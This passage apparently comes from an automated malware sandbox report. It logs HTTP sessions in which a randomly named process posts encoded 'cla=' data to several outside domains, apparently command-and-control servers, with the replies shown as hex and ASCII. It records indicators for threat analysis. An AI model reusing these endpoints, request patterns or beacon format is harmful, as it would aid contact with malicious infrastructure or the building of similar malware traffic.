                                                                                                            Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 45 53 70 70 43 79 75 2b 6d 64 73 79 6c 39 44 44 2f 45 6f 69 66 69 56 48 44 39 70 74 6e 39 72 4f 6b 47 72 56 4e 78 50 56 4b 55 65 30 78 46 76 2f 76 33 64 4a 48 31 34 70 38 6d 48 4b 66 7a 48 76 78 44 4f 41 49 6d 37 54 36 48 57 51 38 66 41 68 77 4a 36 31 70 34 57 6f 6c 4d 4e 55 68 44 76 30 2f 39 41 54 41 7a 53 6e 49 39 67 6a 37 54 43 6f 54 76 52 70 34 71 6c 79 4a 63 50 48 4d 6a 73 47 59 48 53 42 47 69 6f 39 61 4c 56 51 33 73 71 71 73 4c 75 71 56 79 45 54 51 45 57 4f 6a 67 2f 6b 6b 34 77 4c [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49786 | 38.47.232.124 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:36.363432884 CET | 347 | OUT | GET /klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 22, 2024 07:55:37.999794960 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:55:37 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49806 | 199.59.243.227 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:43.927213907 CET | 622 | OUT | POST /w9z4/ HTTP/1.1
Host: www.acond-22-mvr.click
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.acond-22-mvr.click
Cache-Control: max-age=0
Content-Length: 204
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.acond-22-mvr.click/w9z4/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: cla=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGUFQDdNu5wWMMeiiu1DUsj8iNvyVaAmnsCBQaqjo=
Nov 22, 2024 07:55:45.004997015 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 22 Nov 2024 06:55:44 GMT
content-type: text/html; charset=utf-8
content-length: 1138
x-request-id: bdda98a2-2a46-4d4f-b6e5-91f6766d10f5
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
set-cookie: parking_session=bdda98a2-2a46-4d4f-b6e5-91f6766d10f5; expires=Fri, 22 Nov 2024 07:10:44 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 22, 2024 07:55:45.005063057 CET | 591 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmRkYTk4YTItMmE0Ni00ZDRmLWI2ZTUtOTFmNjc2NmQxMGY1IiwicGFnZV90aW1lIjoxNzMyMjU4NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49811 | 199.59.243.227 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:46.801234007 CET | 642 | OUT | POST /w9z4/ HTTP/1.1
Host: www.acond-22-mvr.click
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.acond-22-mvr.click
Cache-Control: max-age=0
Content-Length: 224
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.acond-22-mvr.click/w9z4/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: cla=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcO1/hdtRWGFYiAq00+Nas8flm+SasxTFWMTDoTz
Nov 22, 2024 07:55:47.945991993 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 22 Nov 2024 06:55:47 GMT
content-type: text/html; charset=utf-8
content-length: 1138
x-request-id: d4e0efec-9af5-4742-9dfe-7baf37e30861
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
set-cookie: parking_session=d4e0efec-9af5-4742-9dfe-7baf37e30861; expires=Fri, 22 Nov 2024 07:10:47 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 22, 2024 07:55:47.946059942 CET | 591 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDRlMGVmZWMtOWFmNS00NzQyLTlkZmUtN2JhZjM3ZTMwODYxIiwicGFnZV90aW1lIjoxNzMyMjU4NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49817 | 199.59.243.227 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:55:49.538902044 CET | 1659 | OUT | POST /w9z4/ HTTP/1.1
Host: www.acond-22-mvr.click
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.acond-22-mvr.click
Cache-Control: max-age=0
Content-Length: 1240
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.acond-22-mvr.click/w9z4/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 31 67 33 53 46 2b 75 30 43 5a 61 74 76 57 44 74 41 38 55 50 47 61 6c 52 51 77 47 35 44 4b 75 58 63 34 4b 7a 6a 36 6d 62 34 34 4c 63 6e 30 49 4b 34 36 4a 42 6d 57 70 51 6e 43 64 7a 4a 4d 42 71 4e 63 34 52 64 41 39 63 71 53 72 56 6f 6a 65 79 44 67 4b 61 62 56 78 6d 42 51 54 65 39 6e 7a 72 6c 53 45 38 4b 67 62 6e 63 30 4f 41 7a 43 51 4b 36 6f 6b 39 79 75 46 39 47 4c 67 46 45 71 6d 65 44 2f 58 4a 54 64 59 66 33 62 55 5a 43 51 50 76 71 39 5a 71 51 69 37 79 7a 6d 73 6a 56 77 37 6d 7a 75 52 73 47 [TRUNCATED]
Nov 22, 2024 07:55:50.646589994 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 22 Nov 2024 06:55:50 GMT
content-type: text/html; charset=utf-8
content-length: 1138
x-request-id: c6ce5037-a392-44d0-92a8-f40d084c7660
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
set-cookie: parking_session=c6ce5037-a392-44d0-92a8-f40d084c7660; expires=Fri, 22 Nov 2024 07:10:50 GMT; path=/
connection: close
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:50.646948099 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZjZTUwMzctYTM5Mi00NGQwLTkyYTgtZjQwZDA4NGM3NjYwIiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            8 | 192.168.2.5 | 49824 | 199.59.243.227 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:55:52.190720081 CET | 356 | OUT | GET /w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1
                                                                                                            Host: www.acond-22-mvr.click
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:55:53.295386076 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            date: Fri, 22 Nov 2024 06:55:52 GMT
                                                                                                            content-type: text/html; charset=utf-8
                                                                                                            content-length: 1498
                                                                                                            x-request-id: 9c1adc41-be3d-477d-be5b-f5a609875e23
                                                                                                            cache-control: no-store, max-age=0
                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cAbmHhXfzW4KYLGDQcxM+kSPXKt/1QEN1IPeBpGZI4T34FmTFAkwQkwNlAZZw1gtUo91u2rcUYustpatwC8YLg==
                                                                                                            set-cookie: parking_session=9c1adc41-be3d-477d-be5b-f5a609875e23; expires=Fri, 22 Nov 2024 07:10:53 GMT; path=/
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 41 62 6d 48 68 58 66 7a 57 34 4b 59 4c 47 44 51 63 78 4d 2b 6b 53 50 58 4b 74 2f 31 51 45 4e 31 49 50 65 42 70 47 5a 49 34 54 33 34 46 6d 54 46 41 6b 77 51 6b 77 4e 6c 41 5a 5a 77 31 67 74 55 6f 39 31 75 32 72 63 55 59 75 73 74 70 61 74 77 43 38 59 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cAbmHhXfzW4KYLGDQcxM+kSPXKt/1QEN1IPeBpGZI4T34FmTFAkwQkwNlAZZw1gtUo91u2rcUYustpatwC8YLg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:53.295433044 CET | 951 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWMxYWRjNDEtYmUzZC00NzdkLWJlNWItZjVhNjA5ODc1ZTIzIiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            9 | 192.168.2.5 | 49840 | 146.88.233.115 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:55:59.618520021 CET | 619 | OUT | POST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2f 71 30 59 75 31 47 42 4d 53 6f 6b 75 76 48 47 4b 6d 57 47 47 33 57 41 6b 37 71 2f 59 39 51 43 56 71 46 64 35 55 41 3d
                                                                                                            Data Ascii: cla=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/q0Yu1GBMSokuvHGKmWGG3WAk7q/Y9QCVqFd5UA=
                                                                                                            Nov 22, 2024 07:56:01.130518913 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:00 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            10 | 192.168.2.5 | 49846 | 146.88.233.115 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:56:02.335922956 CET | 639 | OUT | POST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 36 34 30 6f 69 49 4a 4e 78 72 50 4a 56 74 6e 44 56 62 42 43 50 79 51 70 65 36 57 34 42 53 4d 61 6c 72 54 74 58 56
                                                                                                            Data Ascii: cla=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVX640oiIJNxrPJVtnDVbBCPyQpe6W4BSMalrTtXV
                                                                                                            Nov 22, 2024 07:56:03.594099998 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:03 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            11 | 192.168.2.5 | 49855 | 146.88.233.115 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
